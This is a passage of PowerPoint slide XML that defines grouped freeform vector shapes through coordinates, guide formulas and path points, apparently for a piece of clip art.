            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2955" y="397"/>
                <a:ext cx="276" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1795 w 1795"/>
                  <a:gd name="T1" fmla="*/ 0 h 1420"/>
                  <a:gd name="T2" fmla="*/ 1795 w 1795"/>
                  <a:gd name="T3" fmla="*/ 936 h 1420"/>
                  <a:gd name="T4" fmla="*/ 0 w 1795"/>
                  <a:gd name="T5" fmla="*/ 1420 h 1420"/>
                  <a:gd name="T6" fmla="*/ 0 w 1795"/>
                  <a:gd name="T7" fmla="*/ 482 h 1420"/>
                  <a:gd name="T8" fmla="*/ 1795 w 1795"/>
                  <a:gd name="T9" fmla="*/ 0 h 14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95"/>
                  <a:gd name="T16" fmla="*/ 0 h 1420"/>
                  <a:gd name="T17" fmla="*/ 1795 w 1795"/>
                  <a:gd name="T18" fmla="*/ 1420 h 14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95" h="1420">
                    <a:moveTo>
                      <a:pt x="1795" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1795" y="936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1795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" name="Freeform 12941"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2945" y="381"/>
                <a:ext cx="348" cy="106"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2267"/>
                  <a:gd name="T1" fmla="*/ 607 h 690"/>
                  <a:gd name="T2" fmla="*/ 2267 w 2267"/>
                  <a:gd name="T3" fmla="*/ 0 h 690"/>
                  <a:gd name="T4" fmla="*/ 2267 w 2267"/>
                  <a:gd name="T5" fmla="*/ 76 h 690"/>
                  <a:gd name="T6" fmla="*/ 0 w 2267"/>
                  <a:gd name="T7" fmla="*/ 690 h 690"/>
                  <a:gd name="T8" fmla="*/ 0 w 2267"/>
                  <a:gd name="T9" fmla="*/ 607 h 6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67"/>
                  <a:gd name="T16" fmla="*/ 0 h 690"/>
                  <a:gd name="T17" fmla="*/ 2267 w 2267"/>
                  <a:gd name="T18" fmla="*/ 690 h 6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67" h="690">
                    <a:moveTo>
                      <a:pt x="0" y="607"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2267" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2267" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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4" name="Freeform 12942"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2738" y="419"/>
                <a:ext cx="207" cy="68"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T1" fmla="*/ 359 h 442"/>
                  <a:gd name="T2" fmla="*/ 0 w 1345"/>
                  <a:gd name="T3" fmla="*/ 0 h 442"/>
                  <a:gd name="T4" fmla="*/ 3 w 1345"/>
                  <a:gd name="T5" fmla="*/ 76 h 442"/>
                  <a:gd name="T6" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T7" fmla="*/ 442 h 442"/>
                  <a:gd name="T8" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T9" fmla="*/ 359 h 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5"/>
                  <a:gd name="T16" fmla="*/ 0 h 442"/>
                  <a:gd name="T17" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T18" fmla="*/ 442 h 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5" h="442">
                    <a:moveTo>
                      <a:pt x="1345" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1345" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1345" y="3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" name="Freeform 12943"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2738" y="325"/>
                <a:ext cx="555" cy="149"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3612"/>
                  <a:gd name="T1" fmla="*/ 609 h 968"/>
                  <a:gd name="T2" fmla="*/ 2285 w 3612"/>
                  <a:gd name="T3" fmla="*/ 0 h 968"/>
                  <a:gd name="T4" fmla="*/ 3612 w 3612"/>
                  <a:gd name="T5" fmla="*/ 361 h 968"/>
                  <a:gd name="T6" fmla="*/ 1345 w 3612"/>
                  <a:gd name="T7" fmla="*/ 968 h 968"/>
                  <a:gd name="T8" fmla="*/ 0 w 3612"/>
                  <a:gd name="T9" fmla="*/ 609 h 9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12"/>
                  <a:gd name="T16" fmla="*/ 0 h 968"/>
                  <a:gd name="T17" fmla="*/ 3612 w 3612"/>
                  <a:gd name="T18" fmla="*/ 968 h 9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12" h="968">
                    <a:moveTo>
                      <a:pt x="0" y="609"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2285" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3612" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1345" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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" name="Freeform 12944"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2832" y="464"/>
                <a:ext cx="106" cy="119"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 685"/>
                  <a:gd name="T1" fmla="*/ 0 h 775"/>
                  <a:gd name="T2" fmla="*/ 0 w 685"/>
                  <a:gd name="T3" fmla="*/ 591 h 775"/>
                  <a:gd name="T4" fmla="*/ 685 w 685"/>
                  <a:gd name="T5" fmla="*/ 775 h 775"/>
                  <a:gd name="T6" fmla="*/ 685 w 685"/>
                  <a:gd name="T7" fmla="*/ 185 h 775"/>
                  <a:gd name="T8" fmla="*/ 0 w 685"/>
                  <a:gd name="T9" fmla="*/ 0 h 7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5"/>
                  <a:gd name="T16" fmla="*/ 0 h 775"/>
                  <a:gd name="T17" fmla="*/ 685 w 685"/>
                  <a:gd name="T18" fmla="*/ 775 h 77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5" h="775">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="775"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="1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" name="Freeform 12945"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2842" y="475"/>
                <a:ext cx="86" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 562"/>
                  <a:gd name="T1" fmla="*/ 0 h 633"/>
                  <a:gd name="T2" fmla="*/ 0 w 562"/>
                  <a:gd name="T3" fmla="*/ 482 h 633"/>
                  <a:gd name="T4" fmla="*/ 562 w 562"/>
                  <a:gd name="T5" fmla="*/ 633 h 633"/>
                  <a:gd name="T6" fmla="*/ 562 w 562"/>
                  <a:gd name="T7" fmla="*/ 152 h 633"/>
                  <a:gd name="T8" fmla="*/ 0 w 562"/>
                  <a:gd name="T9" fmla="*/ 0 h 6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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 633"/>
                  <a:gd name="T17" fmla="*/ 562 w 562"/>
                  <a:gd name="T18" fmla="*/ 633 h 6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2" h="633">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="152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08" name="Group 12946"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2988" y="431"/>
                <a:ext cx="207" cy="152"/>
                <a:chOff x="2988" y="431"/>
                <a:chExt cx="207" cy="152"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="175" name="Freeform 12947"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2988" y="431"/>
                  <a:ext cx="207" cy="152"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1354"/>
                    <a:gd name="T1" fmla="*/ 990 h 990"/>
                    <a:gd name="T2" fmla="*/ 0 w 1354"/>
                    <a:gd name="T3" fmla="*/ 364 h 990"/>
                    <a:gd name="T4" fmla="*/ 711 w 1354"/>
                    <a:gd name="T5" fmla="*/ 175 h 990"/>
                    <a:gd name="T6" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T7" fmla="*/ 0 h 990"/>
                    <a:gd name="T8" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T9" fmla="*/ 626 h 990"/>
                    <a:gd name="T10" fmla="*/ 711 w 1354"/>
                    <a:gd name="T11" fmla="*/ 796 h 990"/>
                    <a:gd name="T12" fmla="*/ 0 w 1354"/>
                    <a:gd name="T13" fmla="*/ 990 h 99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54"/>
                    <a:gd name="T22" fmla="*/ 0 h 990"/>
                    <a:gd name="T23" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T24" fmla="*/ 990 h 99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54" h="990">
                      <a:moveTo>
                        <a:pt x="0" y="990"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="626"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="796"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="99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2948"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3000" y="471"/>
                  <a:ext cx="86" cy="98"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 560 w 560"/>
                    <a:gd name="T1" fmla="*/ 0 h 636"/>
                    <a:gd name="T2" fmla="*/ 560 w 560"/>
                    <a:gd name="T3" fmla="*/ 485 h 636"/>
                    <a:gd name="T4" fmla="*/ 0 w 560"/>
                    <a:gd name="T5" fmla="*/ 636 h 636"/>
                    <a:gd name="T6" fmla="*/ 0 w 560"/>
                    <a:gd name="T7" fmla="*/ 152 h 636"/>
                    <a:gd name="T8" fmla="*/ 560 w 560"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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0"/>
                    <a:gd name="T16" fmla="*/ 0 h 636"/>
                    <a:gd name="T17" fmla="*/ 560 w 560"/>
                    <a:gd name="T18" fmla="*/ 636 h 6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0" h="636">
                      <a:moveTo>
                        <a:pt x="560" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="560" y="485"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="636"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56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2949"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3100" y="445"/>
                  <a:ext cx="86" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 562 w 562"/>
                    <a:gd name="T1" fmla="*/ 0 h 633"/>
                    <a:gd name="T2" fmla="*/ 562 w 562"/>
                    <a:gd name="T3" fmla="*/ 482 h 633"/>
                    <a:gd name="T4" fmla="*/ 0 w 562"/>
                    <a:gd name="T5" fmla="*/ 633 h 633"/>
                    <a:gd name="T6" fmla="*/ 0 w 562"/>
                    <a:gd name="T7" fmla="*/ 151 h 633"/>
                    <a:gd name="T8" fmla="*/ 562 w 562"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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2"/>
                    <a:gd name="T16" fmla="*/ 0 h 633"/>
                    <a:gd name="T17" fmla="*/ 562 w 562"/>
                    <a:gd name="T18" fmla="*/ 633 h 63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2" h="633">
                      <a:moveTo>
                        <a:pt x="562" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="562" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="633"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56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9" name="Group 12950"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2961" y="223"/>
                <a:ext cx="106" cy="174"/>
                <a:chOff x="2961" y="223"/>
                <a:chExt cx="106" cy="174"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="167" name="Oval 12951"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2984" y="382"/>
                  <a:ext cx="58" cy="15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 algn="ctr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8" name="Freeform 12952"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3003" y="238"/>
                  <a:ext cx="20" cy="154"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 57"/>
                    <a:gd name="T1" fmla="*/ 0 h 425"/>
                    <a:gd name="T2" fmla="*/ 0 w 57"/>
                    <a:gd name="T3" fmla="*/ 418 h 425"/>
                    <a:gd name="T4" fmla="*/ 28 w 57"/>
                    <a:gd name="T5" fmla="*/ 425 h 425"/>
                    <a:gd name="T6" fmla="*/ 57 w 57"/>
                    <a:gd name="T7" fmla="*/ 418 h 425"/>
                    <a:gd name="T8" fmla="*/ 57 w 57"/>
                    <a:gd name="T9" fmla="*/ 0 h 425"/>
                    <a:gd name="T10" fmla="*/ 0 w 57"/>
                    <a:gd name="T11" fmla="*/ 0 h 42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425"/>
                    <a:gd name="T20" fmla="*/ 57 w 57"/>
                    <a:gd name="T21" fmla="*/ 425 h 42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425">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="418"/>
                        <a:pt x="0" y="418"/>
                        <a:pt x="0" y="418"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="422"/>
                        <a:pt x="13" y="425"/>
                        <a:pt x="28" y="425"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="425"/>
                        <a:pt x="57" y="422"/>
                        <a:pt x="57" y="418"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="0"/>
                        <a:pt x="57" y="0"/>
                        <a:pt x="57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169" name="Group 12953"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2961" y="223"/>
                  <a:ext cx="106" cy="39"/>
                  <a:chOff x="2968" y="233"/>
                  <a:chExt cx="106" cy="39"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="170" name="Freeform 12954"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2968" y="241"/>
                    <a:ext cx="74" cy="31"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 485"/>
                      <a:gd name="T1" fmla="*/ 0 h 201"/>
                      <a:gd name="T2" fmla="*/ 0 w 485"/>
                      <a:gd name="T3" fmla="*/ 71 h 201"/>
                      <a:gd name="T4" fmla="*/ 485 w 485"/>
                      <a:gd name="T5" fmla="*/ 201 h 201"/>
                      <a:gd name="T6" fmla="*/ 485 w 485"/>
                      <a:gd name="T7" fmla="*/ 130 h 201"/>
                      <a:gd name="T8" fmla="*/ 0 w 485"/>
                      <a:gd name="T9" fmla="*/ 0 h 20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85"/>
                      <a:gd name="T16" fmla="*/ 0 h 201"/>
                      <a:gd name="T17" fmla="*/ 485 w 485"/>
                      <a:gd name="T18" fmla="*/ 201 h 20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85" h="201">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="71"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="485" y="201"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="485" y="13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1" name="Freeform 12955"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3063" y="258"/>
                    <a:ext cx="11" cy="14"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 68"/>
                      <a:gd name="T1" fmla="*/ 90 h 90"/>
                      <a:gd name="T2" fmla="*/ 0 w 68"/>
                      <a:gd name="T3" fmla="*/ 19 h 90"/>
                      <a:gd name="T4" fmla="*/ 68 w 68"/>
                      <a:gd name="T5" fmla="*/ 0 h 90"/>
                      <a:gd name="T6" fmla="*/ 68 w 68"/>
                      <a:gd name="T7" fmla="*/ 71 h 90"/>
                      <a:gd name="T8" fmla="*/ 0 w 68"/>
                      <a:gd name="T9" fmla="*/ 90 h 9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8"/>
                      <a:gd name="T16" fmla="*/ 0 h 90"/>
                      <a:gd name="T17" fmla="*/ 68 w 68"/>
                      <a:gd name="T18" fmla="*/ 90 h 9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8" h="90">
                        <a:moveTo>
                          <a:pt x="0" y="90"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="19"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="68" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="68" y="71"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="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2" name="Rectangle 12956"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3042" y="261"/>
                    <a:ext cx="21" cy="11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 algn="ctr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3" name="Freeform 12957"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2968" y="233"/>
                    <a:ext cx="106" cy="28"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 204 w 690"/>
                      <a:gd name="T1" fmla="*/ 0 h 184"/>
                      <a:gd name="T2" fmla="*/ 69 w 690"/>
                      <a:gd name="T3" fmla="*/ 2 h 184"/>
                      <a:gd name="T4" fmla="*/ 3 w 690"/>
                      <a:gd name="T5" fmla="*/ 21 h 184"/>
                      <a:gd name="T6" fmla="*/ 0 w 690"/>
                      <a:gd name="T7" fmla="*/ 54 h 184"/>
                      <a:gd name="T8" fmla="*/ 485 w 690"/>
                      <a:gd name="T9" fmla="*/ 184 h 184"/>
                      <a:gd name="T10" fmla="*/ 622 w 690"/>
                      <a:gd name="T11" fmla="*/ 184 h 184"/>
                      <a:gd name="T12" fmla="*/ 690 w 690"/>
                      <a:gd name="T13" fmla="*/ 165 h 184"/>
                      <a:gd name="T14" fmla="*/ 690 w 690"/>
                      <a:gd name="T15" fmla="*/ 130 h 184"/>
                      <a:gd name="T16" fmla="*/ 204 w 690"/>
                      <a:gd name="T17" fmla="*/ 0 h 18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690"/>
                      <a:gd name="T28" fmla="*/ 0 h 184"/>
                      <a:gd name="T29" fmla="*/ 690 w 690"/>
                      <a:gd name="T30" fmla="*/ 184 h 184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690" h="184">
                        <a:moveTo>
                          <a:pt x="204" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="69" y="2"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="21"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="54"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="485" y="184"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="622" y="184"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="690" y="165"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="690" y="130"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="20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" name="Oval 12958"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3010" y="245"/>
                    <a:ext cx="20" cy="5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 algn="ctr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10" name="Group 12959"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2992" y="815"/>
                <a:ext cx="287" cy="223"/>
                <a:chOff x="2988" y="817"/>
                <a:chExt cx="287" cy="223"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="143" name="Group 12960"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2988" y="976"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="164" name="Freeform 12961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5" name="Freeform 12962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6" name="Freeform 12963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4" name="Group 12964"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3088" y="949"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="161" name="Freeform 12965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2966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3" name="Freeform 12967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5" name="Group 12968"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3188" y="922"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="158" name="Freeform 12969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9" name="Freeform 12970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0" name="Freeform 12971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6" name="Group 12972"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2988" y="871"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="155" name="Freeform 12973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6" name="Freeform 12974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7" name="Freeform 12975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7" name="Group 12976"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3088" y="844"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="152" name="Freeform 12977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Freeform 12978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4" name="Freeform 12979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8" name="Group 12980"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3188" y="817"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="149" name="Freeform 12981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0" name="Freeform 12982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1" name="Freeform 12983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11" name="Group 12984"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2758" y="846"/>
                <a:ext cx="187" cy="196"/>
                <a:chOff x="2748" y="859"/>
                <a:chExt cx="187" cy="196"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="127" name="Group 12985"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2748" y="991"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="140" name="Freeform 12986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1" name="Freeform 12987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2988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28" name="Group 12989"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2848" y="964"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="137" name="Freeform 12990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8" name="Freeform 12991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9" name="Freeform 12992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29" name="Group 12993"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2748" y="886"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="134" name="Freeform 12994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5" name="Freeform 12995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6" name="Freeform 12996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30" name="Group 12997"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2848" y="859"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="131" name="Freeform 12998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2" name="Freeform 12999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" name="Freeform 13000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12" name="Group 13001"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
